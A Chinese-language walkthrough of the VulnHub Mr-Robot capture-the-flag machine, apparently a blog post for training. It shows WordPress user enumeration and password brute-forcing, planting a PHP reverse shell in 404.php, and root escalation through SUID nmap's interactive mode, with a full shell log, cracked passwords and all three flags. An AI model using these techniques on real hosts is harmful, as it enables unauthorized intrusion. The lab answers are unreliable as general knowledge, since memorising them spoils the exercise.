前言
靶機主題來自美劇《黑客軍團》,這是一部傳達極客精神和黑客文化的上佳作品,不同于《硅谷》的搞笑風格,這部劇的主角Eliot患有精神分裂,整部劇的情節都較為壓抑,有點類似于電影《搏擊俱樂部》中雙重人格的斗爭。
雖然有影視色彩的加成,但是劇中的黑客技術細節還是足夠真實的,起碼符合常規的入侵滲透思路,強烈推薦該劇。
本次靶機有三個flag,難度在初級到中級,非常適合新手訓練學習,不需要逆向技術,目標就是找到三個key,并且拿到主機root權限。
環境配置
靶機下載地址:https://www.vulnhub.com/entry/mr-robot-1,151/
我使用的是VMware,導入ova文件,NAT方式連接后靶機自動獲取IP
本次實戰:
靶機IP:192.168.128.142
攻擊機IP:192.168.128.106
實戰演練
nmap開路,IP發現:
端口發現,服務版本探測:
nmap -sV -O 192.168.128.142
開啟了三個端口,發現web端口:80,443
查看源碼沒有發現可用信息,用dirb跑目錄:
發現有robots.txt文件,訪問http://192.168.128.142/robots.txt
發現兩個文件,訪問發現第一個目錄里是一個密碼字典,第二個像是一個密碼哈希,這是第一個key
073403c8a58a1f80d943455fb30724b9
密碼哈希無法爆破,字典也先放著后面用,現在用nikto掃描,看看有沒有可用漏洞:
發現有wordpress服務,之前dirb掃目錄也發現了wordpress登錄頁面
http://192.168.128.142/wp-login
發現wordpress服務,用wpscan掃描網站,只有登錄頁面,并沒有發現什么可用漏洞
在登錄頁面隨便輸入之前字典中的用戶,發現可以枚舉用戶名:
用burp枚舉出了兩個用戶名:
用elloit作為用戶名,再掛上這個字典跑密碼:
跑了好久,終于跑出密碼:ER28-0652,字典實在太大了,對字典做了篩選為了截圖方便就把重新跑了一遍
接下來就是獲取權限了,登陸之后,依次點擊apperance>editor>404.php
在kali找到php-reverse-shell.php,將其覆蓋到404.php更改監聽端口,IP
攻擊機上監聽此端口,訪問http://192.168.128.142/234543658,任意不存在頁面觸發shell
執行 python -c ‘import pty; pty.spawn(“/bin/bash”)’ 獲得一個更加穩定的shell
接下來查看靶機密碼文件:
發現沒法利用,先放一放。再看看其他目錄,找到一個密碼的md5散列.
拿出來破解:https://hashkiller.co.uk/md5-decrypter.aspx
abcdefghijklmnopqrstuvwxyz
用得到的密碼登錄robot
拿到第二個key,并且又拿到一個加密哈希,估計這個是root用戶的密碼
提升權限,但是沒有成功,只能想別的辦法
最后找到一個辦法,用nmap執行root權限
nmap產生了一個root權限的新shell
代碼如下:
daemon@linux:/$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz
robot@linux:/$ id
id
uid=1002(robot) gid=1002(robot) groups=1002(robot)
robot@linux:/$ pwd
pwd
/
robot@linux:/$ cd /home
cd /home
robot@linux:/home$ ls
ls
robot
robot@linux:/home$ cd robot
cd robot
robot@linux:~$ ls
ls
key-2-of-3.txt password.raw-md5
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
robot@linux:~$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
robot@linux:~$ find / -user root -perm -4000 2>/dev/null
find / -user root -perm -4000 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
robot@linux:~$ /usr/local/bin/nmap —version
/usr/local/bin/nmap —version
nmap version 3.81 ( http://www.insecure.org/nmap/ )
robot@linux:~$ nmap —interactive
nmap —interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode — press h for help
nmap> !whoami
!whoami
root
waiting to reap child : No child processes
nmap> !bash -p
!bash -p
bash-4.3# whoami
whoami
root
bash-4.3# cd /root
cd /root
bash-4.3# ls -al
ls -al
total 32
drwx——— 3 root root 4096 Nov 13 2015 .
drwxr-xr-x 22 root root 4096 Sep 16 2015 ..
-rw———- 1 root root 4058 Nov 14 2015 .bash_history
-rw-r—r— 1 root root 3274 Sep 16 2015 .bashrc
drwx——— 2 root root 4096 Nov 13 2015 .cache
-rw-r—r— 1 root root 0 Nov 13 2015 firstboot_done
-r———— 1 root root 33 Nov 13 2015 key-3-of-3.txt
-rw-r—r— 1 root root 140 Feb 20 2014 .profile
-rw———- 1 root root 1024 Sep 16 2015 .rnd
bash-4.3# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
bash-4.3# ls
ls
firstboot_done key-3-of-3.txt
成功拿到第三個key:
04787ddef27c3dee1ee161b21670b4e4
拿到靶機root權限,game over。
總結
這個靶機的難度并不大,遇到的難點:
1.使用 python -c ‘import pty; pty.spawn(“/bin/bash”)’ 可以獲得一個穩定的shell,這個在實際滲透中用處也很大
2.用了很多辦法,一直拿不到root權限,查了很多資料發現了nmap自帶的提權腳本,這個技能get
3.這個靶機只開了web端口,ssh應該也是可以觸發的,大牛們可以嘗試
4.思路就是通過web頁面漏洞拿下了整個主機,wp提權思路也很多,大家也可以換思路滲透
| 
